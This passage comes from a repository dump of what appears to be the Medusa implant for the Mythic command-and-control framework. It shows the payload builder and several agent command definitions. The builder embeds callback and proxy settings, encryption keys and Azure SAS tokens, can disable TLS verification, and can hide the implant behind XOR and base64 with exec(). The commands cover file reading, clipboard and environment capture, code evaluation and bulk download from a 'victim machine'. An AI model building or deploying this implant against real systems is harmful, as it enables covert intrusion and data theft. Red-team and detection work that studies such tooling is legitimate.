os.path.exists(os.path.join(directory, \"{}.py\".format(file))):\n            #while we've specified a python version, this function is agnostic so just return the .py\n            filename = os.path.join(directory, \"{}.py\".format(file))\n        elif pyv == \"Python 2.7\":\n            filename = os.path.join(directory, \"{}.py2\".format(file))\n        elif pyv == \"Python 3.8\":\n            filename = os.path.join(directory, \"{}.py3\".format(file))\n\n        if not os.path.exists(filename) or not filename:\n            return \"\"\n        else:\n            return filename\n\n    def _read_file(self, path: str) -> str:\n        with open(path, \"r\") as f:\n            return f.read()\n\n    def _apply_https_setting(self, base_code: str, profile_name: str) -> str:\n        if self.get_parameter(\"https_check\") != \"No\":\n            return base_code.replace(\"#CERTSKIP\", \"\")\n\n        if profile_name == \"azure_blob\":\n            return base_code.replace(\n                \"#CERTSKIP\",\n                \"\"\"\n    gcontext = ssl.create_default_context()\n    gcontext.check_hostname = False\n    gcontext.verify_mode = ssl.CERT_NONE\\n\"\"\"\n            )\n\n        return base_code.replace(\"urlopen(req)\", \"urlopen(req, context=gcontext)\").replace(\n            \"#CERTSKIP\",\n            \"\"\"\n        gcontext = ssl.create_default_context()\n        gcontext.check_hostname = False\n        gcontext.verify_mode = ssl.CERT_NONE\\n\"\"\"\n        )\n\n    def _parse_transport_template(self, template_code: str) -> dict:\n        parts = re.split(r\"###\\s*(IMPORTS|CLASS_FIELDS|FUNCTIONS|CONFIG)\\s*###\", template_code)\n        sections = {\"IMPORTS\": \"\", \"CLASS_FIELDS\": \"\", \"FUNCTIONS\": \"\", \"CONFIG\": \"\"}\n        for i in range(1, len(parts), 2):\n            section_name = parts[i].strip()\n            section_value = parts[i + 1]\n            sections[section_name] = section_value.strip(\"\\n\")\n        return sections\n\n    def _validate_transport_template_format(self, profile_name: str, template_code: str):\n        required = [\"IMPORTS\", \"CLASS_FIELDS\", \"FUNCTIONS\", \"CONFIG\"]\n        markers = re.findall(r\"###\\s*(IMPORTS|CLASS_FIELDS|FUNCTIONS|CONFIG)\\s*###\", template_code)\n        missing = [m for m in required if markers.count(m) == 0]\n        duplicates = [m for m in required if markers.count(m) > 1]\n        if missing or duplicates:\n            details = []\n            if missing:\n                details.append(\"missing markers: {}\".format(\", \".join(missing)))\n            if duplicates:\n                details.append(\"duplicate markers: {}\".format(\", \".join(duplicates)))\n            raise ValueError(\n                \"Transport template transport_{} has invalid section markers ({})\".format(\n                    profile_name,\n                    \"; \".join(details)\n                )\n            )\n\n    def _validate_transport_sections(self, profile_name: str, sections: dict):\n        required_non_empty = [\"FUNCTIONS\", \"CONFIG\"]\n        missing = [s for s in required_non_empty if not sections.get(s, \"\").strip()]\n        if missing:\n            raise ValueError(\n                \"Transport template transport_{} is missing required non-empty sections: {}\".format(\n                    profile_name,\n                    \", \".join(missing)\n                )\n            )\n\n    def _validate_core_markers_replaced(self, base_code: str, profile_name: str):\n        unresolved = [\n            marker for marker in [\n                \"TRANSPORT_IMPORTS\",\n                \"TRANSPORT_CLASS_FIELDS\",\n                \"TRANSPORT_FUNCTIONS\",\n                \"TRANSPORT_CONFIG\",\n            ]\n            if marker in base_code\n        ]\n        if unresolved:\n            raise ValueError(\n                \"Core template marker replacement failed for transport_{}; unresolved markers: {}\".format(\n                    profile_name,\n                    \", \".join(unresolved)\n                )\n            )\n\n    def _get_base_code_for_profile(self, profile_name: str) -> str:\n        base_path = self.getPythonVersionFile(os.path.join(self.agent_code_path, \"base_agent\"), \"base_agent_core\")\n        transport_path = self.getPythonVersionFile(os.path.join(self.agent_code_path, \"base_agent\"), f\"transport_{profile_name}\")\n        if not base_path:\n            raise ValueError(\"Missing base_agent_core template for selected python version\")\n        if not transport_path:\n            raise ValueError(\"Missing transport template for profile {} and selected python version\".format(profile_name))\n\n        base_code = self._read_file(base_path)\n        transport_template = self._read_file(transport_path)\n        self._validate_transport_template_format(profile_name, transport_template)\n        transport_sections = self._parse_transport_template(transport_template)\n        self._validate_transport_sections(profile_name, transport_sections)\n\n        base_code = base_code.replace(\"TRANSPORT_IMPORTS\", transport_sections[\"IMPORTS\"])\n        base_code = base_code.replace(\"TRANSPORT_CLASS_FIELDS\", transport_sections[\"CLASS_FIELDS\"])\n        base_code = base_code.replace(\"TRANSPORT_FUNCTIONS\", transport_sections[\"FUNCTIONS\"])\n        base_code = base_code.replace(\"TRANSPORT_CONFIG\", transport_sections[\"CONFIG\"])\n        self._validate_core_markers_replaced(base_code, profile_name)\n        return base_code\n\n    def _to_python_literal(self, value):\n        if isinstance(value, str):\n            return value\n        return json.dumps(value).replace(\"false\", \"False\").replace(\"true\", \"True\").replace(\"null\", \"None\")\n\n    def _apply_c2_parameter_replacements(self, base_code: str, c2):\n        params = c2.get_parameters_dict()\n        replacements = {\n            \"callback_host\": params.get(\"callback_host\", \"\"),\n            \"callback_port\": params.get(\"callback_port\", \"\"),\n            \"post_uri\": params.get(\"post_uri\", \"\"),\n            \"get_uri\": params.get(\"get_uri\", \"\"),\n            \"query_path_name\": params.get(\"query_path_name\", \"\"),\n            \"proxy_host\": params.get(\"proxy_host\", \"\"),\n            \"proxy_user\": params.get(\"proxy_user\", \"\"),\n            \"proxy_pass\": params.get(\"proxy_pass\", \"\"),\n            \"proxy_port\": params.get(\"proxy_port\", \"\"),\n            \"callback_interval\": params.get(\"callback_interval\", \"\"),\n            \"callback_jitter\": params.get(\"callback_jitter\", \"\"),\n            \"killdate\": params.get(\"killdate\", \"\"),\n            \"AESPSK\": params.get(\"AESPSK\", {}),\n            \"encrypted_exchange_check\": params.get(\"encrypted_exchange_check\", \"\"),\n            \"HEADER_PLACEHOLDER\": params.get(\"headers\", {}),\n        }\n\n        for placeholder, value in replacements.items():\n            if placeholder in base_code:\n                base_code = base_code.replace(placeholder, self._to_python_literal(value))\n        return base_code\n\n    async def build(self) -> BuildResponse:\n        # this function gets called to create an instance of your payload\n        resp = BuildResponse(status=BuildStatus.Success)\n        # create the payload\n        build_msg = \"\"\n        try:\n            command_code = \"\"\n            for cmd in self.commands.get_commands():\n                command_path = self.getPythonVersionFile(self.agent_code_path, cmd)\n                if not command_path:\n                    build_msg += \"{} command not available for {}.\\n\".format(cmd, self.get_parameter(\"python_version\"))\n                else:\n                    command_code += self._read_file(command_path) + \"\\n\"\n\n            selected_c2 = None\n            for c2 in self.c2info:\n                profile_name = c2.get_c2profile()[\"name\"]\n                if profile_name in [\"http\", \"azure_blob\"]:\n                    selected_c2 = c2\n                    break\n\n            if selected_c2 is None:\n                build_msg += \"No supported C2 profile selected for {}.\\n\".format(self.name)\n                resp.set_status(BuildStatus.Error)\n                resp.build_stderr = \"Error building payload: \" + build_msg\n                return resp\n\n            profile_name = selected_c2.get_c2profile()[\"name\"]\n            base_code = self._get_base_code_for_profile(profile_name)\n\n            if profile_name == \"azure_blob\":\n                params = selected_c2.get_parameters_dict()\n                killdate = params.get(\"killdate\", None)\n                callback_interval = str(params.get(\"callback_interval\", \"30\"))\n                callback_jitter = str(params.get(\"callback_jitter\", \"10\"))\n\n                config_data = await SendMythicRPCOtherServiceRPC(MythicRPCOtherServiceRPCMessage(\n                    ServiceName=\"azure_blob\",\n                    ServiceRPCFunction=\"generate_config\",\n                    ServiceRPCFunctionArguments={\n                        \"killdate\": killdate,\n                        \"payload_uuid\": self.uuid\n                    }\n                ))\n                if not config_data.Success:\n                    resp.status = BuildStatus.Error\n                    resp.build_stderr = f\"Build failed: {config_data.Error}\"\n                    return resp\n\n                await SendMythicRPCPayloadUpdatebuildStep(\n                    MythicRPCPayloadUpdateBuildStepMessage(\n                        PayloadUUID=self.uuid,\n                        StepName=\"Provisioning Azure Container\",\n                        StepStdout=f\"Container provisioned with scoped SAS token\\nEndpoint: {config_data.Result['blob_endpoint']}\",\n                        StepSuccess=True\n                    )\n                )\n                await SendMythicRPCPayloadUpdatebuildStep(\n                    MythicRPCPayloadUpdateBuildStepMessage(\n                        PayloadUUID=self.uuid,\n                        StepName=\"Stamping Configuration\",\n                        StepStdout=\"Embedding Azure configuration into agent\",\n                        StepSuccess=True\n                    )\n                )\n\n                base_code = base_code.replace(\"BLOB_ENDPOINT_PLACEHOLDER\", config_data.Result[\"blob_endpoint\"])\n                base_code = base_code.replace(\"CONTAINER_NAME_PLACEHOLDER\", config_data.Result[\"container_name\"])\n                base_code = base_code.replace(\"CONTAINER_SAS_PLACEHOLDER\", config_data.Result[\"sas_token\"])\n                base_code = base_code.replace(\"CALLBACK_INTERVAL_PLACEHOLDER\", callback_interval)\n                base_code = base_code.replace(\"CALLBACK_JITTER_PLACEHOLDER\", callback_jitter)\n                base_code = base_code.replace(\"AGENT_UUID_PLACEHOLDER\", self.uuid)\n\n            base_code = self._apply_https_setting(base_code, profile_name)\n\n\n            if self.get_parameter(\"use_non_default_cryptography_lib\") == \"Yes\":\n                crypto_code = self._read_file(self.getPythonVersionFile(os.path.join(self.agent_code_path, \"base_agent\"), \"crypto_lib\"))\n            else:\n                crypto_code = self._read_file(self.getPythonVersionFile(os.path.join(self.agent_code_path, \"base_agent\"), \"manual_crypto\"))\n\n            base_code = base_code.replace(\"CRYPTO_HERE\", crypto_code)\n            base_code = base_code.replace(\"UUID_HERE\", self.uuid)\n            base_code = base_code.replace(\"#COMMANDS_HERE\", command_code)\n\n            base_code = self._apply_c2_parameter_replacements(base_code, selected_c2)\n\n            if build_msg != \"\":\n                resp.build_stderr = build_msg\n                resp.set_status(BuildStatus.Error)\n\n            await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage(\n                PayloadUUID=self.uuid,\n                StepName=\"Gathering Files\",\n                StepStdout=\"Found all files for payload\",\n                StepSuccess=True\n            ))\n\n            if self.get_parameter(\"obfuscate_script\") == \"Yes\":\n                key = hashlib.md5(os.urandom(128)).hexdigest().encode()\n                encrypted_content = ''.join(chr(c^k) for c,k in zip(base_code.encode(), cycle(key))).encode()\n                b64_enc_content = base64.b64encode(encrypted_content)\n                xor_func = \"chr(c^k)\" if self.get_parameter(\"python_version\") == \"Python 3.8\" else \"chr(ord(c)^ord(k))\"\n                base_code = \"\"\"import base64, itertools\nexec(''.join({} for c,k in zip(base64.b64decode({}), itertools.cycle({}))).encode())\n\"\"\".format(xor_func, b64_enc_content, key)\n\n                await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage(\n                    PayloadUUID=self.uuid,\n                    StepName=\"Obfuscating Script\",\n                    StepStdout=\"Script successfully obfuscated.\",\n                    StepSuccess=True\n                ))\n            else:\n                await SendMythicRPCPayloadUpdatebuildStep(MythicRPCPayloadUpdateBuildStepMessage(\n                    PayloadUUID=self.uuid,\n                    StepName=\"Obfuscating Script\",\n                    StepStdout=\"Obfuscation not requested, skipping.\",\n                    StepSuccess=True\n                ))\n\n            if self.get_parameter(\"output\") == \"base64\":\n                resp.payload = base64.b64encode(base_code.encode())\n                resp.build_message = \"Successfully Built\"\n            else:\n                resp.payload = base_code.encode()\n                resp.build_message = \"Successfully built!\"\n        except Exception as e:\n            resp.set_status(BuildStatus.Error)\n            resp.build_stderr = \"Error building payload: \" + str(e)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/cat.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass CatArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.String,\n                description=\"Read and output the content of a file\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                self.add_arg(\"path\", self.command_line)\n        else:\n            raise ValueError(\"Missing arguments\")\n\nclass CdCommand(CommandBase):\n    cmd = \"cat\"\n    needs_admin = False\n    help_cmd = \"cat /path/to/file\"\n    description = \"Read and output the contents of a file\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [ \"T1005\" ]\n    argument_class = CatArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n    \n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = task.args.get_arg(\"path\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/cd.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\n\n\nclass CdArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.String,\n                default_value=\".\",\n                description=\"Path of file or folder on the current system to cd to\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                self.args[\"path\"].value = self.command_line\n        else:\n            self.args[\"path\"].value = \".\"\n\n\nclass CdCommand(CommandBase):\n    cmd = \"cd\"\n    needs_admin = False\n    help_cmd = \"cd /path/to/file\"\n    description = \"Change working directory\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = CdArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = task.args.get_arg(\"path\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/clipboard.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\nclass GetClipboardArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass GetClipboardCommand(CommandBase):\n    cmd = \"clipboard\"\n    needs_admin = False\n    help_cmd = \"clipboard\"\n    description = \"This reads and outputs the contents of the clipboard using ObjC APIs\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = GetClipboardArguments\n    attackmapping = [ \"T1115\" ]\n    attributes = CommandAttributes(\n        filter_by_build_parameter={\n            \"python_version\": \"Python 2.7\"\n        },\n        supported_python_versions=[\"Python 2.7\"],\n        supported_os=[SupportedOS.MacOS],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/cp.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass CpArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"destination\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=2\n                )],\n                description=\"Location for copied file or folder\",\n            ),\n            CommandParameter(\n                name=\"source\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=1\n                )],\n                description=\"Path to file or folder for copying\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 2:\n                self.add_arg(\"source\", pieces[0])\n                self.add_arg(\"destination\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\nclass CpCommand(CommandBase):\n    cmd = \"cp\"\n    needs_admin = False\n    help_cmd = \"cp source destination\"\n    description = \"copy file or folder to destination\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = CpArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Copying \" + str(task.args.get_arg(\"source\")) + \" to \"\n        task.display_params += str(task.args.get_arg(\"destination\"))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/cwd.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\nclass GetCwdArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass GetCwdCommand(CommandBase):\n    cmd = \"cwd\"\n    needs_admin = False\n    help_cmd = \"cwd\"\n    description = \"This gets the current working directory\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = GetCwdArguments\n    attackmapping = []\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n    \n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/download.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\n\nclass DownloadArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"file\", \n                type=ParameterType.String, \n                description=\"File to download.\",\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )]\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) == 0:\n            raise Exception(\"Require a path to download.\\n\\tUsage: {}\".format(DownloadCommand.help_cmd))\n        filename = \"\"\n        if self.command_line[0] == '\"' and self.command_line[-1] == '\"':\n            self.command_line = self.command_line[1:-1]\n            filename = self.command_line\n        elif self.command_line[0] == \"'\" and self.command_line[-1] == \"'\":\n            self.command_line = self.command_line[1:-1]\n            filename = self.command_line\n        elif self.command_line[0] == \"{\":\n            temp_json = json.loads(self.command_line)\n            # if \"host\" in temp_json:\n            #     # this means we have tasking from the file browser rather than the popup UI\n            #     # the medusa agent doesn't currently have the ability to do _remote_ listings, so we ignore it\n            # filename = temp_json[\"path\"] + \"/\" + temp_json[\"file\"]\n            filename = temp_json[\"file\"]\n            # else:\n            #     raise Exception(\"Unsupported JSON\")\n        else:\n            filename = self.command_line\n\n        if filename != \"\":\n            self.args[0].value = filename\n        \n\nclass DownloadCommand(CommandBase):\n    cmd = \"download\"\n    needs_admin = False\n    help_cmd = \"download {path to remote file}\"\n    description = \"Download a file from the victim machine to the Mythic server in chunks (no need for quotes in the path).\"\n    version = 1\n    supported_ui_features = [\"file_browser:download\"]\n    is_download_file = True\n    author = \"@ajpc500\"\n    parameters = []\n    attackmapping = [\"T1020\", \"T1030\", \"T1041\"]\n    argument_class = DownloadArguments\n    browser_script = BrowserScript(script_name=\"download\", author=\"@its_a_feature_\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:\n        response = PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n        download_file = taskData.args.get_arg(\"file\")\n        response.DisplayParams = f\"{download_file}\"\n        return response\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/download_bulk.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\n\nclass DownloadBulkArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.Array,\n                default_value=[],\n                description=\"Paths of file(s) or director(ies) to download.\",\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )]\n            ),\n            CommandParameter(\n                name=\"mode\",\n                type=ParameterType.ChooseOne,\n                choices=[\"archive\", \"iterative\"],\n                default_value=\"archive\",\n                description=(\n                    \"Download mode: 'archive' bundles all files into a single in-memory zip archive, \"\n                    \"'iterative' sends each file individually.\"\n                ),\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )]\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) == 0:\n            raise Exception(\n                \"Require a path to download.\\n\\tUsage: {}\".format(DownloadBulkCommand.help_cmd)\n            )\n\n        if self.command_line[0] == \"{\":\n            temp_json = json.loads(self.command_line)\n            if \"path\" in temp_json:\n                path_val = temp_json[\"path\"]\n                if isinstance(path_val, str):\n                    temp_json[\"path\"] = [path_val]\n            self.load_args_from_dictionary(temp_json)\n        else:\n            raw = self.command_line\n            if (raw[0] == '\"' and raw[-1] == '\"') or (raw[0] == \"'\" and raw[-1] == \"'\"):\n                raw = raw[1:-1]\n            self.add_arg(\"path\", [raw])\n\n\nclass DownloadBulkCommand(CommandBase):\n    cmd = \"download_bulk\"\n    needs_admin = False\n    help_cmd = 'download_bulk {\"path\": [\"/remote/path\", \"/remote/path2\"], \"mode\": \"archive\"}'\n    description = (\n        \"Bulk download file(s), director(ies), or a mix from the target machine. \"\n        \"Use 'archive' mode to bundle everything into a single in-memory zip, \"\n        \"or 'iterative' mode to transfer each file individually.\"\n    )\n    version = 1\n    is_download_file = True\n    author = \"@maclarel\"\n    parameters = []\n    attackmapping = [\"T1020\", \"T1030\", \"T1041\"]\n    argument_class = DownloadBulkArguments\n    browser_script = BrowserScript(script_name=\"download_bulk\", author=\"@maclarel\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],\n    )\n\n    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:\n        response = PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n        paths = taskData.args.get_arg(\"path\")\n        mode = taskData.args.get_arg(\"mode\") or \"archive\"\n        display = \", \".join(paths) if isinstance(paths, list) else str(paths)\n        response.DisplayParams = f\"{display} (mode: {mode})\"\n        return response\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/env.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\nclass GetEnvArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass GetEnvCommand(CommandBase):\n    cmd = \"env\"\n    needs_admin = False\n    help_cmd = \"env\"\n    description = \"This gets all environment variables\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"@ajpc500\"\n    argument_class = GetEnvArguments\n    attackmapping = []\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/eval_code.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json, re\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass EvalArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"command\",\n                type=ParameterType.String,\n                description=\"Command to evaluate in Python interpreter\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            self.add_arg(\"command\", self.command_line)\n        \n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass EvalCommand(CommandBase):\n    cmd = \"eval_code\"\n    needs_admin = False\n    help_cmd = \"eval_code python-code\"\n    description = \"Evaluate python code in interpreter\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = EvalArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = task.args.get_arg(\"command\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/exit.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\n\n\nclass ExitArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass ExitCommand(CommandBase):\n    cmd = \"exit\"\n    needs_admin = False\n    help_cmd = \"exit\"\n    description = \"This exits the current agent process\"\n    version = 1\n    supported_ui_features = [\"callback_table:exit\"]\n    is_exit = True\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_remove_file = False\n    is_upload_file = False\n    author = \"\"\n    argument_class = ExitArguments\n    attackmapping = []\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/jobkill.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass JobKillArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"target_task_id\",\n                type=ParameterType.String,\n                description=\"Stop a long-running job\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                self.add_arg(\"target_task_id\", self.command_line)\n        else:\n            raise ValueError(\"Missing arguments\")\n\nclass JobKillCommand(CommandBase):\n    cmd = \"jobkill\"\n    needs_admin = False\n    help_cmd = \"jobkill {task_id}\"\n    description = \"Sends a stop signal to a long-running job\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = JobKillArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Sending stop signal for task with id: \" + task.args.get_arg(\"target_task_id\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/jobs.py",
